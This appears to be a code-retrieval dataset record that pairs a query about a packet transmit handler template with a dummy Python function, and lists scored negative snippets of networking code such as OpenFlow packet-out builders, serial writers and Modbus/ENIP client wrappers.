[ "0.6083645", "0.6083645", "0.6004842", "0.5940256", "0.58412826", "0.5745346", "0.56811863", "0.56805307", "0.56792486", "0.5678725", "0.55001324", "0.5463868", "0.545723", "0.54208636", "0.5390863", "0.5390862", "0.537292", "0.5355706", "0.5340329", "0.5338251", "0.5322882", "0.5310049", "0.5300135", "0.5296107", "0.52940166", "0.5285544", "0.5272581", "0.52451754", "0.52399856", "0.5237932", "0.5228706", "0.52188355", "0.52087027", "0.5183115", "0.5158989", "0.51232654", "0.5110588", "0.5092747", "0.50772595", "0.5056112", "0.5043114", "0.5039806", "0.50344354", "0.50336766", "0.5026967", "0.50265044", "0.49873203", "0.49829775", "0.49825504", "0.4980617", "0.49695927", "0.4936405", "0.49311095", "0.49307865", "0.49286452", "0.491929", "0.49147418", "0.4892436", "0.4891645", "0.4886199", "0.48651513", "0.48478356", "0.48474348", "0.48349", "0.48317665", "0.48248994", "0.48227954", "0.48051482", "0.4794901", "0.47937927", "0.47842795", "0.4770235", "0.4769043", "0.47689015", "0.47622252", "0.47582713", "0.47487843", "0.4738657", "0.4729835", "0.47253552", "0.47206187", "0.4717365", "0.4696819", "0.4689705", "0.46870726", "0.46828488", "0.4670389", "0.46627396", "0.46504024", "0.46358055", "0.46352118", "0.46288493", "0.4628687", "0.4628687", "0.46268198", "0.46264943", "0.46227932", "0.4622501", "0.46163377", "0.46083903" ]
0.5686567
6
Transmit handler template for documentation out_port The port number to which the packet is to be sent packet A bytearray object holding the packet to transmit
def dummy_transmit_handler(out_port, packet): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, out):", "def _post(self, which_port, msg):\n return _spacegrant_swig.binary_sink_sptr__post(self, which_port, msg)", "def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))", "def process(self, parsed_packet):\n byte_buf = parsed_packet.serialize()\n out_port= parsed_packet.get_field(\"intrinsic_metadata.egress_port\")\n logging.debug(\"Transmit pkt id %d to %d\" % (parsed_packet.id, out_port))\n buf = bytearray(byte_buf)\n for idx in range((len(buf) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n self.transmit_handler(out_port, byte_buf)", "def add_out_port(self, m: int, content: str, **opts) -> None:", "def _send_packet_out(self, packet: Packet, port) -> None:\n try:\n p = self.shell.PacketOut(bytes(packet), egress_port=str(port))\n p.send()\n logging.debug(\"Sending packet out: egress_port {}\".format(port))\n except UserError as e:\n logging.debug(e)\n return", "def __init__(self, port):\n self.port = port\n self.action_type = 'output'", "def send_packet_out(dp, pkt, out_port, in_port=ofp.OFPP_CONTROLLER):\n actions = [parser.OFPActionOutput(out_port)]\n msg = parser.OFPPacketOut(datapath=dp,\n buffer_id=ofp.OFP_NO_BUFFER,\n in_port=in_port,\n actions=actions,\n data=pkt)\n return msg", "def sendto(self, data: bytes, address: Tuple) -> int:\n ...", "def record(self, port_name, t_start=None):", "def port_out(self) -> int:\n return self.proto.port_out", "def OutputPort(*args, **kw):\n return Port.make_shared(OutputPortInterface(*args, **kw))", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr__post(self, which_port, msg)", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_pdu_packer_sptr__post(self, which_port, msg)", "def transmit(self, value):\n if (self.__sink == None):\n return\n target = self.__sink.target\n target(value)", "def net_send(out_data: bytes, conn: socket.socket) -> None:\n print(\"Sending {} bytes\".format(len(out_data)))\n conn.send(out_data)", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. 
= normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... = Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t..1. ... = More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n 
else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def out(self, out):\n\n self._out = out", "def packet_out(self, data, in_port, out_port, out_queue, nq=0):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n dpid = self.datapath.id\n #*** First build OF version specific list of actions:\n if nq:\n #*** Packet out with no queue (nq):\n actions = [self.datapath.ofproto_parser.OFPActionOutput \\\n (out_port, 0)]\n\n else:\n #*** Note: out_port must come last!\n actions = [\n parser.OFPActionSetQueue(out_queue),\n parser.OFPActionOutput(out_port, 0)]\n\n #*** Now have we have actions, build the packet out message:\n out = parser.OFPPacketOut(\n datapath=self.datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n\n self.logger.debug(\"Sending Packet-Out message dpid=%s port=%s\",\n dpid, out_port)\n #*** Tell the switch to send the packet:\n self.datapath.send_msg(out)", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def write(self, proto):\n pass", "def _vendor_request_out(self, request, value=0, index=0, data=None, timeout=1000):\n return self._vendor_request(usb.ENDPOINT_OUT, request, value=value,\n index=index, length_or_data=data, timeout=timeout)", "def send(self, data):", "def transmit(self, message):\n pass", "def send_byte(byte_out):\n GPIO.output(clock_pin, 0)\n # set the chip select to write\n GPIO.output(chip_select, 1)\n # send the byte \n values = [(ord(byte_out) >> i) % 2 for i in range(0, 8)]\n GPIO.setup(data_pins, GPIO.OUT)\n GPIO.output(data_pins, values)\n # flash the clock pin\n GPIO.output(clock_pin, 1)\n GPIO.output(clock_pin, 0)", "def output(self, p_addr = 0):\n\t\tout_pos = self.get_address(p_addr, 1)\n\t\tself.out_param += [self.get_data(out_pos)]\n\t\tif self.debug:\n\t\t\tprint(\"DIAGNOSTIC:\", self.out_param[-1])\n\t\tself.pos += 2", "def _send_data_to_nn(self,wbtData):\n\t\tself._neuralNetwork.stdin.write(\"COMM IN\\n\") # this shitty COMM IN is not really needed..to modify in closedloop.py\n\t\tself._neuralNetwork.stdin.write(wbtData)", "def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. 
(We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).", "def callback_serial_write(data):\n serial_write(data.data)", "def message_ports_out(self):\n return _spacegrant_swig.binary_sink_sptr_message_ports_out(self)", "def outWriteEvent(self):\r\n pass", "def _post(self, *args, **kwargs):\n return _uhd_swig.usrp_sink_sptr__post(self, *args, **kwargs)", "def send_packet(sender, payload):\n sender.write(payload)", "def write(self, data):\n\t\tself.outputbuffer.write(data)", "def _post(self, which_port: \"swig_pmt_ptr\", msg: \"swig_pmt_ptr\") -> \"void\":\n return _beamforming_swig.phasedarray_sptr__post(self, which_port, msg)", "def send_packet(sender, payload):\n\n sender.write(payload)", "def send_to_engine(self, wi):\n pass", "def __send__(self,val):\n assert(len(val) == 1)\n assert(type(val) == bytes)\n v = int.from_bytes(val,byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"GREEN\")\n print(\">> %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n self.port.write(val)", "def out_data(self, port: int) -> Optional[Any]:\n try:\n return copy(self.outputs[port])\n except:\n return None", "def _post(self, which_port, msg):\n return _spacegrant_swig.hdlc_framer_sptr__post(self, which_port, msg)", "def __init__(self, address, ap, data):\n super(WriteRequest, self).__init__(address=address, ap=ap, data=data)", "def send_to_port(self):\r\n time.sleep(2)\r\n # ser.write(\"R\".encode())\r\n ser.flush()\r\n ser.write(\"{},{},{},{},{}\".format(self.x_Pos, self.y_Pos, self.t_Tap, self.U_on, self.u_off).encode())\r\n # ser.flush()\r\n # while (1 == 1):\r\n # mydata = ser.readline().lstrip()\r\n # print(mydata.decode('utf-8'))\r\n # value = str(mydata)\r", "def packet_write(self):\n bytes_written = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN, bytes_written\n \n while len(self.out_packet) > 0:\n pkt = self.out_packet[0]\n write_length, status = nyamuk_net.write(self.sock, pkt.payload)\n if write_length > 0:\n pkt.to_process -= write_length\n pkt.pos += write_length\n \n bytes_written += write_length\n \n if pkt.to_process > 0:\n return NC.ERR_SUCCESS, bytes_written\n else:\n if status == errno.EAGAIN or status == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_written\n elif status == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_written\n else:\n return NC.ERR_UNKNOWN, bytes_written\n \n \"\"\"\n if pkt.command & 0xF6 == NC.CMD_PUBLISH and self.on_publish is not None:\n self.in_callback = True\n self.on_publish(pkt.mid)\n self.in_callback = False\n \"\"\"\n \n #next\n del self.out_packet[0]\n \n #free data (unnecessary)\n \n self.last_msg_out = time.time()\n \n \n return NC.ERR_SUCCESS, bytes_written", "def writetif(self,outputname,):\n pass", "def server_do(self,input, connstream):\r\n pass", "def send_packet(self, buffer_id, raw_data, out_port, in_port):\n # We tell the switch to take the packet with id buffer_if from in_port \n # and send it to out_port\n # If the switch did not specify a buffer_id, it must have specified\n # the raw data of the packet, so in this case we tell it to send\n # the raw data\n msg = of.ofp_packet_out()\n msg.in_port = in_port\n if buffer_id != -1 and buffer_id is not None:\n # We got a buffer ID from the switch; use that\n msg.buffer_id = buffer_id\n else:\n # No 
buffer ID from switch -- we got the raw data\n if raw_data is None:\n # No raw_data specified -- nothing to send!\n return\n msg.data = raw_data\n \n # Add an action to send to the specified port\n if out_port == of.OFPP_FLOOD:\n # send to all active ports according to STP\n for outPort in self.ports_use:\n if outPort != in_port:\n action = of.ofp_action_output(port=outPort)\n msg.actions.append(action)\n else:\n action = of.ofp_action_output(port=out_port)\n msg.actions.append(action)\n # Send message to switch\n self.connection.send(msg)", "def transmit(self, data, response_schema, secondary=False):\n\n if secondary:\n address = self.secondary_receiver_address\n else:\n address = self.receiver_address\n logger.info(\n f\"Starting new connection to {address} with \" f\"secure={self.use_tls}\"\n )\n\n with TCPTransport(address, secure=self.use_tls) as transport:\n transport.connect()\n\n transport.send(data.encode(self.ENCODING))\n\n return self._receive(transport, response_schema)", "def _send(self, frame):\n \n self.device.write(frame)", "def serialTransmit( motorInput ):\n\n\tpub = rospy.Publisher('/rxtx/sendMA', UInt8MultiArray)\n\tstartByte = 58 # ':'\t\n\tmotorByteToSend = int( '00000000', 2 ) \n\tarmByteToSend = int( '00000000', 2 ) \n\tbuttonByteToSend = int( '00000000', 2 ) \n\tchecksumByteToSend = 123\n\n\t#rospy.loginfo(\"MotorByteToSend: \" + str( motorByteToSend ) )\n\t\n\tif motorInput.leftMotor > 50:\n\t\t# Set bit to forward\n\t\tmotorByteToSend += 1 << 7\n\n\tif motorInput.rightMotor > 50: \n \t\t# Set bit to forward\n\t\tmotorByteToSend += 1 << 3\n\n\t# Set Mag divided into 3 quadrents, \n\tif motorInput.leftMotor < ( 50 / 3 ) or motorInput.leftMotor > ( 100 - ( 50 / 3 ) ):\n\t\t# Set to 3 \n\t\tmotorByteToSend += 1 << 6\n\t\tmotorByteToSend += 1 << 5\n\telif motorInput.leftMotor < ( ( 50 / 3 ) * 2 ) or motorInput.leftMotor > ( 100 - ( ( 50 / 3 ) * 2 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 6\n\telif motorInput.leftMotor < ( ( 50 / 3 ) * 3 ) or motorInput.leftMotor > ( 100 - ( ( 50 / 3 ) * 3 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 5\t\n \n\t# Set Mag divided into 3 quadrents, \n\tif motorInput.rightMotor < ( 50 / 3 ) or motorInput.rightMotor > ( 100 - ( 50 / 3 ) ):\n\t\t# Set to 3 \n\t\tmotorByteToSend += 1 << 1\n\t\tmotorByteToSend += 1 << 0\n\telif motorInput.rightMotor < ( ( 50 / 3 ) * 2 ) or motorInput.rightMotor > ( 100 - ( ( 50 / 3 ) * 2 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 1\n\telif motorInput.rightMotor < ( ( 50 / 3 ) * 3 ) or motorInput.rightMotor > ( 100 - ( ( 50 / 3 ) * 3 ) ):\n\t\t# Set to 2 \t\t\n\t\tmotorByteToSend += 1 << 0\t\n\n\n\tmessage = struct.pack('>BBBBB', startByte, motorByteToSend, armByteToSend, buttonByteToSend, checksumByteToSend )\n\n\n\n\t# Old Test Code\n\t#\tif motorInput.leftMotor == 50 and motorInput.rightMotor == 50:\n\t#\tmessage = struct.pack('>BBBBB', ';', motorInput.leftMotor, motorInput.rightMotor)\t\t\t\n\t\t#message = struct.pack('>BBB', 123, motorInput.leftMotor, motorInput.rightMotor)\n\t#\telse:\n\t#\tmessage = struct.pack('>BBBBB', 122, motorInput.leftMotor, motorInput.rightMotor)\n\t\t#message = struct.pack('>BBB', 122, motorInput.leftMotor, motorInput.rightMotor)\n\n\n\tpub.publish( data=message )\n\t#rospy.loginfo(message)", "def send_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n out = self._build_packet_out(datapath, buffer_id,\r\n src_port, dst_port, data)\r\n if out:\r\n datapath.send_msg(out)", "def _send(self, what, value, address='localhost:44818', 
**kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def make_output_port(cls, data_class=None):\n class ReturnedOutputPort(OutputPort):\n\n \"\"\"A subclass of InputPort accepting provided types.\"\"\"\n\n def emits(self):\n \"\"\"Return the class emitted by the port.\"\"\"\n return data_class\n\n return ReturnedOutputPort", "def write(self, out, message):\n if out != None:\n out.write(message)", "def write( data ):", "def outReceived(self, data):\n self.protocol.dataReceived(data)", "def message_ports_out(self):\n return _uhd_swig.usrp_sink_sptr_message_ports_out(self)", "def s_write(self, data):\n self.s.flushOutput()\n\n if self.s.is_open:\n try:\n self.s.write(data)\n if self.log_output:\n self.logfile.write('\\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\\n')\n except Exception as e:\n print(\"Could not write to port \" + str(e))\n else:\n raise IOError('Comport is not open, use ctl_connect()')", "def send(self, output):\n assert output == 0 or output == 1\n GPIO.output(self.d_out, output)", "def handle_write(self):\n #send_types = \" + \".join(\n # messages.get_message_type(message) for message in self.buffer)\n for message in self.buffer:\n if isinstance(message, str):\n self.send(message)\n else:\n self.send(message.pack())\n self.buffer = []\n #print \"To %s:%s sent: \" % (self.address, self.port), send_types", "def send(self, value, _control=False):\n if not _control:\n self.increment('out')\n for output in self.outputs:\n output.put(value)", "def transmit(self) -> None:\n # Like RadioHead library, turn on high power boost if enabled.\n self.set_boost(_TEST_PA1_BOOST)\n # Enable packet sent interrupt for D0 line.\n self.dio_0_mapping = 0b00\n # Enter TX mode (will clear FIFO!).\n self.operation_mode = TX_MODE", "def send_on_output_port_change(self):\n return self._send_on_output_port_change", "def output_data_type(self):\n return PassThrough", "def write(self, output_buffer):\n self.__writer_func(self.__stream_id, output_buffer)", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr__post(self, which_port, msg)", "def myTransmit(self, connection, apdu):\n # trace request :\n #print 'sending : \\t', toHexString(apdu)\n response, sw1, sw2 = connection.transmit( apdu )\n # trace response :\n #if None == response: response=[]\n #print 'response : \\t', toHexString(response), '\\nstatus words : \\t', \"%x %x\" % (sw1, sw2)\n if sw1 in range(0x61, 0x6f):\n print \"Error: sw1: %x sw2: %x\" % (sw1, sw2)\n return response, sw1, sw2", "def transmit_data(self, data: str, target_node: str = None):\n raise NotImplementedError", "def send_output(self, result, output):\n data = pickle.dumps((result, output))\n self.wfile.write('%d\\n' % len(data))\n self.wfile.write(data)\n self.wfile.flush()", "def _post(self, which_port: \"swig_pmt_ptr\", msg: \"swig_pmt_ptr\") -> \"void\":\n return _beamforming_swig.doaesprit_sptr__post(self, which_port, msg)", "def write(self, buffer):\n utils.print_for_unimplemented_functions(SPI.write.__name__)\n telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_SPI)", 
"def writeOutput(self, output):", "def send(self, data: bytes):", "def message_ports_out(self):\n return _uhd_swig.usrp_source_sptr_message_ports_out(self)", "def outReceived(self, data):\n if data[0:4] == \"port\":\n port = data.split(':')[1]\n self.deferred.callback(port)", "def write_tdm_to_pipe(pkt):\n\n global g_tdm_cnt\n global g_pipein\n\n if UDP in pkt:\n if pkt[UDP].dport == TDM_PORT:\n g_pipein.write(bytes(pkt[UDP].payload))\n g_tdm_cnt += 1\n print(\"\\rTDM Count: {0}. CTRL-C to quit\".format(g_tdm_cnt), end=\" \")", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr__post(self, which_port, msg)", "def _write_v1(self, data):\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)", "def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()", "def full_out_address(self) -> str:\n return f'{self.host}:{self.port_out}'", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def message_ports_out(self):\n return _spacegrant_swig.G3RUH_descramble_sptr_message_ports_out(self)", "def message_ports_out(self):\n return _spacegrant_swig.DeNRZI_sptr_message_ports_out(self)", "def handle_output(self, workunit, label, s):\r\n pass", "def handle_output(self, workunit, label, s):\r\n pass", "def output_ports(self):\n return {\n 'audio_signal': NeuralType(('B', 'T'), AudioSignal(freq=self._sample_rate)),\n 'a_sig_length': NeuralType(tuple('B'), LengthsType()),\n 'label': NeuralType(tuple('B'), LabelsType()),\n 'label_length': NeuralType(tuple('B'), LengthsType()),\n }", "def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out", "def 
Transaction(self,OutBuffer, read = 0):\n ReceiveBuffer = create_string_buffer(chr(0) * 0x80)\n TransmitBuffer= create_string_buffer(OutBuffer)\n Transaction = spi_ioc_transfer()\n Transaction.speed_hz = c_uint32(self.Speed)\n Transaction.tx_buf=addressof(TransmitBuffer)\n Transaction.rx_buf=addressof(ReceiveBuffer)\n Transaction.delay_usecs = self.Delay\n if read > 0 and self.Speed!= self.ReadSpeed: # Slow down speed for reading\n Transaction.speed_hz = self.ReadSpeed\n elif read==0 and self.Speed!=self.WriteSpeed:\n Transaction.speed_hz = self.WriteSpeed\n if self.Speed != Transaction.speed_hz:\n self.Speed = Transaction.speed_hz\n self.SetSpeed()\n if read > len(OutBuffer):\n Transaction.len=read\n else:\n Transaction.len= len(OutBuffer)\n Transaction.bits_per_word = self.Bits\n Transaction.cs_change = 0\n Transaction.pad = 0\n # print type(addressof(Transaction))\n ret = ioctl(self.File,SPI_IOC_MESSAGE(1), addressof(Transaction))\n return ret, ReceiveBuffer", "def outgoing(self,message,isBinary=False,identifier=None):\n pass", "def transmit(self, package):\n \n self.client = JsonClient()\n self.client.connect()\n self.client.sendPackage(package)\n msg = self.client.readPackage()\n \n return msg", "def SendOutputs(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def message_ports_out(self):\n return _spacegrant_swig.general_burster_2_sptr_message_ports_out(self)", "def output(self, _in, out, **kwds):\n out.write(_in.read())", "def write_byte(self, addr, data):\n raise NotImplementedError()", "def message_ports_out(self):\n return _spacegrant_swig.NRZI_sptr_message_ports_out(self)", "def dumpData(self,out,index):\n #--SCVR\n out.pack('4siBB2sB',\n 'SCVR', 5+len(self.text), index+48, self.type, self.func, self.oper)\n if self.text: out.write(self.text)\n #--Value\n if isinstance(self.value,int):\n out.packSub('INTV','i', self.value)\n else:\n out.packSub('FLTV','f', self.value)", "def emit(data):", "def transmit(self, message):\n\n\t\t#Keep track of number of Hello packets sent\n\t\tif message == 'Hello?':\n\t\t\tself.missingCount += 1\n\n\t\t#Packetiser message and inform server of new data\n\t\tself.txData = self.packetiser.pack(message)\n\t\tself.txEvt.set()", "def write_pkts(self, pkt_list):\r\n while True:\r\n # wait for the next transmission\r\n yield self.wait_sys_clks(1)\r\n\r\n # send one word at a time\r\n if len(pkt_list) == 0:\r\n # no more data to send so send blanks\r\n tdata = '\\x00'*self.bus_width\r\n tuser = Tuser(0, 0, 0)\r\n msg = AXI_S_message(tdata,0,0,0,tuser)\r\n self.out_pipe.put(msg)\r\n else:\r\n # send packets\r\n pkt = pkt_list[0]\r\n yield self.env.process(self.send_pkt(pkt))\r\n # remove the pkt we just sent from the pkt_list\r\n pkt_list = pkt_list[1:]", "def comTxRx(self, cmd, dataOut, length):\n if DEBUG > 1: sys.stderr.write(\"* comTxRx()\\n\")\n txFrame = b''\n rxHeader = 0\n rxNum = 0\n\n #Transmitting part ----------------------------------------\n #Prepare data for transmit\n if (length % 2) != 0:\n #/* Fill with one byte to have even number of bytes to send */\n if self.protocolMode == self.MODE_BSL:\n dataOut.append(0xFF) #fill with 0xFF\n else:\n dataOut.append(0) #fill with zero\n\n txFrame = bytes([self.DATA_FRAME | self.seqNo, cmd, len(dataOut), len(dataOut)])\n\n self.reqNo = (self.seqNo + 1) % self.MAX_FRAME_COUNT\n\n txFrame = txFrame + 